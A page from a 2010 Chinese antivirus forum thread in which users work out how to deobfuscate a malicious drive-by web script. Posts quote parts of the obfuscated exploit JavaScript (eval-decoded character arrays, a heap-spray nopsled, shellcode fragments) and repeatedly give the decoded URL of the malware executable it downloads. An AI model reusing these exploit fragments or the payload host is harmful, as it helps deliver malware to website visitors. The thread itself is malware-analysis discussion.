这个网马怎么解密？ - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流这个网马怎么解密？

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12 3

1 / 3 页

跳转页

[求助] 这个网马怎么解密？

微米天空快乐黄口狮帖子:209 注册: 2008-03-15 来自:地球	发表于： 2010-02-09 13:04 \| 只看楼主短消息资料字号：小中大 1楼这个网马怎么解密？ RT，请各位大大帮忙，告诉我方法，是什么加密的题目见16楼微米天空最后编辑于 2010-02-09 20:04:44
微米天空快乐黄口狮帖子:209 注册: 2008-03-15 来自:地球	分享到：

梦幻の星oо 叱咤花甲狮帖子:3711 注册: 2009-11-04 来自:Mr GQ 联盟	发表于： 2010-02-09 13:16 \| 短消息资料字号：小中大 2楼回复：这个网马怎么解密？好像是eval加密吧但是我还是没解出网马哦多抽出一分钟时间回帖，让你的卡卡生活更加精彩~ SREng工具http://bbs.ikaka.com/showtopic-8442813.aspx
梦幻の星oо 叱咤花甲狮帖子:3711 注册: 2009-11-04 来自:Mr GQ 联盟

ty88 卡卡反病毒小组帖子:979 注册: 2007-07-12 来自:	发表于： 2010-02-09 13:37 \| 短消息资料字号：小中大 3楼回复：这个网马怎么解密？ http://www.13the.cn/blackhole/muma.exe
ty88 卡卡反病毒小组帖子:979 注册: 2007-07-12 来自:

ty88 卡卡反病毒小组帖子:979 注册: 2007-07-12 来自:	发表于： 2010-02-09 13:39 \| 短消息资料字号：小中大 4楼回复: 这个网马怎么解密？引用: var sss = Array(590,485,570,160,495,585,580,505,565,565,160,305,160,585,550,505,575,495,485,560,505,200,560,485,605,540,555,485,500,230,570,505,560,540,485,495,505,200,235,335,425,420,345,235,515,320,160,170,185,585,170,205,205,295,160,550,555,560,575,540,505,500,160,305,160,585,550,505,575,495,485,560,505,200,170,185,585,240,485,240,485,185,585,240,485,240,485,170,205,295); var arr = new Array; for (var i = 0; i < sss.length; i ++ ){ arr = String.fromCharCode(sss/5); } var cc=arr.toString();cc=cc.replace(/,/g, ""); cc = cc.replace(/@/g, ","); eval(cc); 首先观察代码此处的EVAL可以运行解密出来得到 nullvar cuteqq = unescape(payload.replace(/CUTE/g, "%u")); nopsled = unescape("%u0a0a%u0a0a"); 意思是上述代码中CUTE就是%u所以替换CUTE然后解密就OK了注意下，shellcode需要按照顺序排列否则解密出来不能看
ty88 卡卡反病毒小组帖子:979 注册: 2007-07-12 来自:

暗夜的雪飘泊而立狮帖子:638 注册: 2009-12-24 来自:娘胎	发表于： 2010-02-09 13:47 \| 短消息资料字号：小中大 5楼回复：这个网马怎么解密？ http://www.13the.cn/blackhole/muma.exe 哇！开了眼界了很牛的加密方法啊 1、替换eavl()，在代码中可以看到unescape(payload.replace(/CUTE/g, "%u"))的代码，其中就告诉了我们要把CUTE字符串改成%u，这个正是解密方法的精髓。 2、用%u代替CUTE，用两次ESC转换得到http://www.1CUTE7433he.cn/blCUTE6361khole/CUTE756dma.exe（这仍然不是最后的网马地址） 3、注意其中还有CUTE字符串，继续替换为%u，再来两次ESC，才能最后得到网马地址：http://www.13the.cn/blackhole/muma.exe 做网马的人真是太狡猾了！！！暗夜的雪最后编辑于 2010-02-09 13:48:57 娱乐致死还是娱乐至死啊？
暗夜的雪飘泊而立狮帖子:638 注册: 2009-12-24 来自:娘胎

ty88 卡卡反病毒小组帖子:979 注册: 2007-07-12 来自:	发表于： 2010-02-09 13:50 \| 短消息资料字号：小中大 6楼回复 5F 暗夜的雪的帖子其实不解密那代码也一样，经验多了看一眼就知道了
ty88 卡卡反病毒小组帖子:979 注册: 2007-07-12 来自:

微米天空快乐黄口狮帖子:209 注册: 2008-03-15 来自:地球	发表于： 2010-02-09 13:51 \| 只看楼主短消息资料字号：小中大 7楼回复 4F ty88 的帖子按照顺序排列是什么意思呢？我解密出来很乱的 [复制到剪贴板] CODE: a10="UTED0FFjWW?W钀http:/"w; a11="fww.13the.cn/blCU"; a12="TE6361khole/CU"; payload =a1+a2+a3+a4+a5+a6+a7+a8+a9+a10+a11+a12+"TE756dma.exe";
微米天空快乐黄口狮帖子:209 注册: 2008-03-15 来自:地球

微米天空快乐黄口狮帖子:209 注册: 2008-03-15 来自:地球	发表于： 2010-02-09 13:53 \| 只看楼主短消息资料字号：小中大 8楼回复 7F 微米天空的帖子明白了原来还要再替换解密啊·~
微米天空快乐黄口狮帖子:209 注册: 2008-03-15 来自:地球

微米天空快乐黄口狮帖子:209 注册: 2008-03-15 来自:地球	发表于： 2010-02-09 13:54 \| 只看楼主短消息资料字号：小中大 9楼回复 5F 暗夜的雪的帖子不错，厉害啊你！
微米天空快乐黄口狮帖子:209 注册: 2008-03-15 来自:地球

遇上爱拙长孩提狮帖子:180 注册: 2008-03-24 来自:广东	发表于： 2010-02-09 14:01 \| 短消息资料字号：小中大 10楼回复：这个网马怎么解密？关于:解密的日志(全体输出 - 1): Level 1>http://www.13the.cn/blackhole/muma.exe 日志由 Redoce2.0第70次修正版于 2010-2-9 13:56:27 生成。 payload = a1+a2+a3+a4+a5+a6+a7+a8+a9+a10+a11+a12+"TE756dCUTE616"+"dCUTE652eCUTE6578"+""+""+""+""+""; 另外那个替换%u的，如4楼所说代码中有一段这样代码，你把a1到a12的全加起来，再加后面的那些，清楚引号和加号
遇上爱拙长孩提狮帖子:180 注册: 2008-03-24 来自:广东

<<上一主题|下一主题>>

12 3

1 / 3 页

跳转页

页面顶部

Powered by Discuz!NT